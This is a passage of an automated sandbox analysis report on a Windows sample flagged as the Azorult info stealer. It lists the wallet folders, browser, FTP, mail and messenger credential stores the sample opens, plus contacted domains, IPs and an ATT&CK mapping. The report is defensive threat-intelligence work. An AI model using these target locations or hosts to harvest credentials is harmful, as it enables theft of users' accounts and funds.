              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\wBBaygjR.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST4BB8.tmp VolumeInformation
              Source: C:\Windows\System32\FXSSVC.exeQueries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST4D9D.tmp VolumeInformation
              Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\msdtc.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Locator.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\SensorDataService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\snmptrap.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\Spectrum.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\OpenSSH\ssh-agent.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\AgentService.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\vds.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\wbengine.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\TieringEngineService.exeKey value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_02C48550 GetVolumeInformationW,wsprintfW,GetLastError,GetLastError,GetUserNameW,GetLastError,GetLastError,GetUserNameW,LocalFree,AllocateAndInitializeSid,wsprintfW,SetEntriesInAclW,GetLastError,OpenMutexW,wsprintfW,8_2_02C48550
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00417098 GetTimeZoneInformation,8_2_00417098
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,8_2_00404C15
              Source: C:\Users\user\Desktop\MUH030425.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Azorult
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1603192431.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1609934065.00000000051FB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2024, type: MEMORYSTR
              Yara detected Azorult Info Stealer
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1691032810.0000000003BED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1691032810.0000000003E2A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1600484490.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1691032810.0000000003F5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2024, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum\wallets\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Jaxx\Local Storage\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Exodus\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %APPDATA%\Ethereum\keystore\
              Source: RegSvcs.exe, 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets\
              Tries to harvest and steal Bitcoin Wallet information
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\monero-project\monero-coreJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\Jump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xmlJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Exodus Eden\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\Jump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
              Source: Yara matchFile source: 8.2.RegSvcs.exe.4f5999a.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.4ecc25c.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.RegSvcs.exe.4eee249.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1609934065.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1605184982.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2024, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Native API              		2
              LSASS Driver              		1
              Abuse Elevation Control Mechanism              		11
              Disable or Modify Tools              		2
              OS Credential Dumping              		11
              System Time Discovery              		1
              Taint Shared Content              		1
              Archive Collected Data              		4
              Ingress Tool Transfer              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Scheduled Task/Job              		1
              DLL Side-Loading              		2
              LSASS Driver              		1
              Deobfuscate/Decode Files or Information              		2
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol4
              Data from Local System              		2
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts2
              Service Execution              		1
              Windows Service              		1
              DLL Side-Loading              		1
              Abuse Elevation Control Mechanism              		1
              Credentials In Files              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCron1
              Scheduled Task/Job              		1
              Windows Service              		3
              Obfuscated Files or Information              		NTDS35
              System Information Discovery              		Distributed Component Object ModelInput Capture114
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
              Process Injection              		12
              Software Packing              		LSA Secrets121
              Security Software Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
              Scheduled Task/Job              		1
              Timestomp              		Cached Domain Credentials31
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading              		DCSync2
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job322
              Masquerading              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt31
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
              Process Injection              		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1628929 Sample: MUH030425.exe Startdate: 04/03/2025 Architecture: WINDOWS Score: 100 69 ww7.przvgke.biz 2->69 71 ww7.fwiwk.biz 2->71 73 88 other IPs or domains 2->73 87 Suricata IDS alerts for network traffic 2->87 89 Found malware configuration 2->89 91 Malicious sample detected (through community Yara rule) 2->91 93 13 other signatures 2->93 9 alg.exe 2->9         started        14 MUH030425.exe 7 2->14         started        16 TieringEngineService.exe 2->16         started        18 20 other processes 2->18 signatures3 process4 dnsIp5 81 dlynankz.biz 85.214.228.140, 49781, 80 STRATOSTRATOAGDE Germany 9->81 83 gjogvvpsf.biz 208.117.43.225, 49755, 49763, 49805 STEADFASTUS United States 9->83 85 11 other IPs or domains 9->85 55 C:\Program Files\...\updater.exe, PE32+ 9->55 dropped 57 C:\Program Files\...\private_browsing.exe, PE32+ 9->57 dropped 59 C:\Program Files\...\plugin-container.exe, PE32+ 9->59 dropped 67 131 other malicious files 9->67 dropped 105 Creates files in the system32 config directory 9->105 107 Drops executable to a common third party application directory 9->107 109 Infects executable files (exe, dll, sys, html) 9->109 61 C:\Users\user\AppData\Roaming\wBBaygjR.exe, PE32 14->61 dropped 63 C:\Users\user\AppData\Local\...\tmpD1E0.tmp, XML 14->63 dropped 65 C:\Users\user\AppData\...\MUH030425.exe.log, ASCII 14->65 dropped 111 Uses schtasks.exe or at.exe to add and modify task schedules 14->111 113 Adds a directory exclusion to Windows Defender 14->113 20 RegSvcs.exe 64 14->20         started        25 powershell.exe 23 14->25         started        27 powershell.exe 23 14->27         started        29 2 other processes 14->29 115 Creates files inside the volume driver (system volume information) 16->115 117 Contains functionality to behave differently if execute on a Russian/Kazak computer 16->117 119 Found direct / indirect Syscall (likely to bypass EDR) 18->119 file6 signatures7 process8 dnsIp9 75 k1d5.icu 104.21.96.1, 49707, 49722, 80 CLOUDFLARENETUS United States 20->75 77 fwiwk.biz 72.52.178.23, 49715, 49719, 49749 LIQUIDWEBUS United States 20->77 79 6 other IPs or domains 20->79 45 C:\Windows\System32\wbengine.exe, PE32+ 20->45 dropped 47 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 20->47 dropped 49 C:\Windows\System32\vds.exe, PE32+ 20->49 dropped 53 81 other malicious files 20->53 dropped 95 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->95 97 Tries to steal Instant Messenger accounts or passwords 20->97 99 Tries to steal Mail credentials (via file / registry access) 20->99 103 7 other signatures 20->103 31 cmd.exe 20->31         started        101 Loading BitLocker PowerShell Module 25->101 33 conhost.exe 25->33         started        35 WmiPrvSE.exe 25->35         started        37 conhost.exe 27->37         started        51 C:\ProgramData\Microsoft\...\Report.wer, Unicode 29->51 dropped 39 conhost.exe 29->39         started        file10 signatures11 process12 process13 41 conhost.exe 31->41         started        43 timeout.exe 31->43         started       

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.